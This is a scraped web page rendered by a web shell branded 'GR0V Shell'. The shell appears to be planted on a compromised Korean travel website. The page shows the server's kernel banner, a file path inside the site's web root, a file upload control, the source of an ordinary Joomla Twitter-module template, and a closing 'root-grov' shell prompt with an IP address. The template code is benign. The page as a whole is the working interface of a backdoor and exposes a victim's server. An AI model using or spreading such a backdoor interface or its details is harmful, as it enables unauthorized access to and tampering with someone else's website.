? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/public_html/old/happy2/modules/mod_jatwitter/tmpl/
File Upload :
Current File : /home/admin/public_html/old/happy2/modules/mod_jatwitter/tmpl/default.ajax.php

<?php 
/**
 * ------------------------------------------------------------------------
 * JA Twitter Module for J25 & J31
 * ------------------------------------------------------------------------
 * Copyright (C) 2004-2011 J.O.O.M Solutions Co., Ltd. All Rights Reserved.
 * @license - GNU/GPL, http://www.gnu.org/licenses/gpl.html
 * Author: J.O.O.M Solutions Co., Ltd
 * Websites: http://www.joomlart.com - http://www.joomlancers.com
 * ------------------------------------------------------------------------
 */

// no direct access
defined('_JEXEC') or die('Restricted access');
?>
<div id="ja_twitter_div" class="content">
	<?php if($showtextheading == "1"){ ?>
		<h4 class="twitter-title"><?php echo $headingtext;?></h4>
	<?php } ?>	
	<?php if ( $showfollowlink == "1" ){ ?>
		<center>
		<script src='http://platform.twitter.com/anywhere.js?id=<?php echo $apikey?>&amp;v=1' type='text/javascript'></script>
<div id="anywhere-block-follow-button"></div>
  <script type="text/javascript">
  	twttr.anywhere(function(twitter) {
    	twitter('#anywhere-block-follow-button').followButton("<?php echo $screenName?>");
  		})
  </script>
  </center>
	<?php }  ?>
</div>

T1KUS90T
  root-grov@210.1.60.28:~$